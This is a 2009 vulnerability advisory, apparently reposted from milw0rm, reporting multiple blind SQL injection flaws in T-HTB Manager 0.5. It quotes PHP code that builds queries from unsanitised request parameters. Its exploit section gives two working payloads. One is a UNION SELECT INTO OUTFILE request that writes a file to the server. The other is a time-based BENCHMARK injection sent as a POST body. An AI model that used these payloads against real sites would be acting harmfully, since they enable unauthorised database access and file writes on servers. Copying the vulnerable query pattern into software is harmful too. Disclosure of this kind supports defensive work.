T-HTB Manager 0.5 Multiple Blind SQL Injection Vulnerabilities******** Salvatore `drosophila` Fresta ******** [+] Application: T-HTB Manager [+] Version: 0.5 [+] Website: http://sourceforge.net/apps/mediawiki/t-htbmanager/index.php?title=Main_Page [+] Bugs: [A] Multiple Blind SQL Injection [+] Exploitation: Remote [+] Date: 10 Sep 2009 [+] Discovered by: Salvatore Fresta aka drosophila [+] Author: Salvatore Fresta aka drosophila [+] E-mail: drosophilaxxx [at] gmail.com *************************************************** [+] Menu 1) Bugs 2) Code 3) Fix *************************************************** [+] Bugs - [A] Multiple Blind SQL Injection [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: index.php All fields in this script are not sanitized but any outputs aren't returned. ... case 'delete_category': $id = $_GET['id']; $id_interfaces = $_GET['id_interfaces']; if($id>0) { $query = `SELECT rgt, lft FROM `.$table_name.` WHERE id='` . $id . `'`; $db_query = mysql_query($query); ... case 'update_category': $name = $_POST['name']; $id = $_POST['id']; $rate = $_POST['rate']; $ceil = $_POST['ceil']; $burst = $_POST['burst']; $prio = $_POST['prio']; $monitor = $_POST['monitor']; if(strlen($name)>0 && $id>0) { $nodelft = $_POST['nodelft']; $lft = $_POST['lft']; $rgt = $_POST['rgt']; $query = `UPDATE `.$table_name.` set name='` . $name . `' , lft='` . $lft . `' , rgt = '` . $rgt . `', rate= '` . $rate . `', ceil = '` . $ceil . `', burst = '` . $burst . `', prio = '` . $prio . `', monitor = '` . $monitor . `' WHERE id='` . $id . `'`; ... And many others.. *************************************************** [+] Code - [A] Multiple Blind SQL Injection This is a Blind SQL Injection bug but into the database there aren't very reserved information such as usernames and/or passwords. However this injection can be used to write arbitrary files on the server (when allowed). http://site/path/index.php?action=delete_category&id=1' UNION ALL SELECT NULL,'evil code' INTO OUTFILE '/tmp/file.php Send it as a POST packet: action=update_category&id=9999&name=blabla' WHERE 1=0 OR IF(ASCII(CHAR(97)) = 97,BENCHMARK(10000000000,null),null)%23 *************************************************** [+] Fix No fix. *************************************************** # milw0rm.com [2009-09-10]